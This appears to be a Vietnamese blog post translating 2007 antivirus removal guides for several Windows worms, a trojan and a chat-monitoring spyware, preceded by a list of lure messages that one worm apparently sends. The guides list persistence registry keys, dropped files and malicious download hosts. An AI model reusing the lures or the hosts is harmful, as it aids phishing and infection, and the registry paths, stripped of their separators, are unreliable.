• Zou ik dit beeld op msn moeten gebruiken?
• Wat denkt u over dit?
• que pensez-vous a ce picure ? je me sens que je semble laid :/
• Voici un nouveau pic de moi
• Quelques images de la semaine derni
• re, voient si vous les aimez
• Avez-vous vu ce picure encore ?
• Haha, est-vous ce sur cette image ?
• Si j'emploient cette image sur le msn ?
• Que pensez-vous a mon image ?
• What do you think of this picure? i feel i look ugly :/
• Here's a new pic of me
• A few pictures from last week, see if you like em
• Have you seen this picure yet?
• Haha, is that you on that picture?
• Should i use this picture on msn?
• What do you think about this?

Attachment: PictureAlbum2007.zip

Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.
4. Tìm đến khóa sau và xóa nó đi :

HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{448BAC42-AABD-42C5-A550-826BF4AF4BB3}InProcServer32"(Default)" = "prodigys323.dll"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionShellServiceObjectDelayLoad"prodigy1" = "{448BAC42-AABD-42C5-A550-826BF4AF4BB3}"
5. Thoát khỏi regedit

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu W32.Deletemusic

Phát hiện: July 30, 2007
Cập nhật: July 30, 2007 4:26:33 PM
Kiểu: Worm
Có kick thước khoảng : 380,416 bytes
Những hệ thống bị ảnh hưởng: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
• %System%configcsrss.exe
• %Windir%mediaarena.exe
• %System%logon.bat
• %System%configàutorun.inf

Tiếp theo nó sẽ tìm kiếm và khởi tạo thêm file vào tất cả các drives trên hệ thống
DRIVE LETTER]:csrss.exe
[DRIVE LETTER]:autorun.inf
Tiếp theo nó sẽ khởi tạo vào trong regedit và sẽ chạy cũng mỗi khi Windows bắt đâu khởi động
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce"Worms" = "C:WINDOWSsystem32logon.bat"

HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFolderOptions" = "1"
HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableTaskMgr" = "1"
Nó sẽ tìm kiếm và delete all *.mp3 trên toàn bộ drives
Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.

Tìm đến khóa sau và xóa đi
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce"Worms" = "C:WINDOWSsystem32logon.bat"
4. Khôi phục lại sau đó xóa file key đó đi

HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFolderOptions" = "1"
HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableTaskMgr" = "1"
5. Thoát khỏi regedit

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu Trojan.Farfli

Phát hiện: July 29, 2007
Cập nhật: July 29, 2007 8:51:54 AM
Kiểu: Trojan
Có kick thước khoảng : Varies
Những hệ thống bị ảnh hưởng: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000

Khi nhiễm Trojan sẽ tự download từ địa chỉ sau
• [http://]install1.ring520.org/kk[REMOVED]
• [http://]install2.ring520.org/kk[REMOVED]
• [http://]install3.ring520.org/kk[REMOVED]
• [http://]install4.ring520.org/kk[REMOVED]
Download file sau đó tự động file sau
• %System%[RANDOM].dll
• %System%drivers[RANDOM 1].sys
• %System%drivers[RANDOM 2].sys
Nó sẽ khởi tạo file sau
%UserProfile%Favorites[CHINESE CHARACTERS].url
Tiếp theo nó tự động add URL vào Internet Explorer:
http://www.6781.com/?001
Tiếp theo nó sẽ khởi tạo vào regedit
• HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_[RANDOM 1]
HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_[RANDOM 2]
HKEY_LOCAL_MACHINESYSTEMControlSet001Services[RANDOM 1]
HKEY_LOCAL_MACHINESYSTEMControlSet001Services[RANDOM 2]
HKEY_LOCAL_MACHINESYSTEMControlSet002ControlClass{8ECC055D-047F-11D1-A537-0000F8753ED1}
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_[RANDOM 1]
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_[RANDOM 2]
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices[RANDOM 1]
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices[RANDOM 2]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftIE4"Main" = "[RANDOM]"
9991
Nó sẽ tự động kiểm tra host và khởi tạo file sau
• 2345
• 7322
• 7255
• 6781

Chỉnh sửa lại host
127.0.0.2 localhost

Nó sẽ tự động sửa lại thanh mặc định của Internet Explorer Tới link sau URLs:
[http://]www.baidu.com/inde[REMOVED]
[http://]www.kzdh.com[REMOVED]
www.7255.com/?g
about.blank.la?g

Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.
Tìm đến và xóa giá trị sau
4. HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_[RANDOM 1]
HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_[RANDOM 2]
HKEY_LOCAL_MACHINESYSTEMControlSet001Services[RANDOM 1]
HKEY_LOCAL_MACHINESYSTEMControlSet001Services[RANDOM 2]
HKEY_LOCAL_MACHINESYSTEMControlSet002ControlClass{8ECC055D-047F-11D1-A537-0000F8753ED1}
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_[RANDOM 1]
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_[RANDOM 2]
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices[RANDOM 1]
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices[RANDOM 2] HKEY_LOCAL_MACHINESOFTWAREMicrosoftIE4"Main" = "[RANDOM]"
5. Thoát khỏi regedit
5. To delete the Web sites added to the Internet Explorer Favorites menu
1. Start Microsoft Internet Explorer
2. Click Favorites > Organize Favorites
3. Delete the Favorites added by the risk

6. To reset the Internet Explorer home page
1. Start Microsoft Internet Explorer.
2. Connect to the Internet, and then go to the page that you want to set as your home page.
3. Click Tools > Internet Options.
4. In the Home page section of the General tab, click Use Current > OK.


Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu W32.Imautorun

Phát hiện: July 25, 2007
Cập nhật: July 25, 2007 1:33:02 PM
Kiểu: Worm
Có kick thước khoảng: 13,824 bytes
Những hệ thống bị ảnh hưởng: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau nó sẽ tự động làm ẩn file hệ thống
[DRIVE LETTER]:msn.exe
[DRIVE LETTER]:autorun.inf
Tiếp theo sẽ thêm vào khóa sau
HKEY_USERSS-1-5-21-1607803123-1685539076-50495302-500SoftwareVB and VBA Program Settingsadtuosa
Tự động cập nhật từ website sau
[http://]vstoo.cn/xxx/adtuo[REMOVED]
Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.

4. Tìm đến khóa sau và chỉnh sửa lại
HKEY_USERSS-1-5-21-1607803123-1685539076-50495302-500SoftwareVB and VBA Program Settingsadtuosa
5. Exit the Registry Editor.

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu W32.Bratsters

Phát hiện: July 25, 2007
Cập nhật: July 25, 2007 2:07:15 PM
Kiểu: Worm
Có kick thước khoảng: 24,548 bytes
Systems Affected: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
%System%wnipsvr.exe
%System%perefic.ini
Tiếp theo nó sẽ khởi tạo thêm file với thuộc tính sau
[DRIVE LETTER]:hide.exe
[DRIVE LETTER]:autorun.inf
Thêm một số khóa vào regedit
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVisual WEB"Start" = "2" HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVisual WEB"ImagePath" = "%System%wnipsvr.exe -run"
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVisual WEB"DisplayName" = "NetworSVSA"
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVisual WEB"Description" = "ÔÊÐí¶ÔTCP/IPÉÏNetBios•þÎñÒÔ¼°NetBTÃû³Æ½âÎöµÄÖ§³Ö¡£"
Nó sẽ download trực tiếp từ Web sau
[http://]cao.ganbibi.com
Save những file download thành những file sau
%ProgramFiles%100.exe
%ProgramFiles%101.exe
%ProgramFiles%102.exe
%ProgramFiles%103.exe
%ProgramFiles%104.exe
%ProgramFiles%105.exe
%ProgramFiles%106.exe
%ProgramFiles%107.exe
%ProgramFiles%108.exe
%ProgramFiles%109.exe
%ProgramFiles%110.exe
%ProgramFiles%111.exe
%ProgramFiles%112.exe
%ProgramFiles%113.exe
%ProgramFiles%114.exe
%ProgramFiles%115.exe
%ProgramFiles%116.exe
%ProgramFiles%117.exe
%ProgramFiles%118.exe
%ProgramFiles%119.exe
%ProgramFiles%120.exe

Mặc định sẽ conection tới Web site :
[http://]bratsersrock.com

Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.

Tìm đến khoá sau và xóa
4. KEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVisual WEB"Start" = "2"
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVisual WEB"ImagePath" = "%System%wnipsvr.exe -run"
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVisual WEB"DisplayName" = "NetworSVSA"
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVisual WEB"Description" = "ÔÊÐí¶ÔTCP/IPÉÏNetBios•þÎñÒÔ¼°NetBTÃû³Æ½âÎöµÄÖ§³Ö¡£"
5. Thoát khỏi regedit

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt Spyware.StealthChatMon

Cập nhật: July 23, 2007 3:22:12 PM
Kiểu: Spyware
Name: Stealth Chat Monitor
Version: 1.5 (build 93)
Publisher: Amplusnet
Risk Impact: High
Systems Affected: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsAIMusers.usr
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsICQusers.usr
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsMSNusers.usr
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsSkypeusers.usr
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsSysAllDaySysMessenger.xsl
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsSysbk.bmp
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsSysMessenger.xsl
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsSystemChatErrors.txt
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsTestEmail.xml
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsYahoousers.usr
• C:Documents and SettingsAll UsersApplication DataSystemMessengerSendEmail.exe
• C:Documents and SettingsAll UsersApplication DataSystemMessengerSystemChatHelp.chm
• C:Documents and SettingsAll UsersApplication DataSystemMessengerSystemMessenger.dll
• C:Documents and SettingsAll UsersApplication DataSystemMessengerSystemMessenger.exe
• C:Documents and SettingsAll UsersApplication DataSystemMessengerSystemMessengerUninstaller.exe
• C:Documents and SettingsAll UsersApplication DataSystemMessengerxcacls.exe
Nó sẽ khởi tạo thêm file sau
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsAIM
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsICQ
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsMSN
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsSkype
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsUsers
• C:Documents and SettingsAll UsersApplication DataSystemMessengerLogsYahoo
• Tiếp theo nó sẽ khởi tạo vào trong regedit và sẽ chạy cũng mỗi khi Windows bắt đâu khởi động
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"SystemMessenger" = "C:WINDOWSsystem32rundll32.exe "C:Documents and SettingsAll UsersApplication DataSystemMessengerSystemMessenger.dll" rdl"
HKEY_LOCAL_MACHINESOFTWARESystemMessenger
• AIM
• ICQ
• MSN
• Skype
• Yahoo
Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
• Click Start > Run.
• Type regedit
• Click OK.
Tìm đến khóa sau và xóa đi

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"SystemMessenger" = "C:WINDOWSsystem32rundll32.exe "C:Documents and SettingsAll UsersApplication DataSystemMessengerSystemMessenger.dll" rdl"
• Tìm đến khóa sau và xóa đi:

HKEY_LOCAL_MACHINESOFTWARESystemMessenger
• Thoát khỏi regedit
Translate Vansuc_nguyen@yahoo.co.uk

được đăng bởi THDao @ 00:17 0 Nhận xét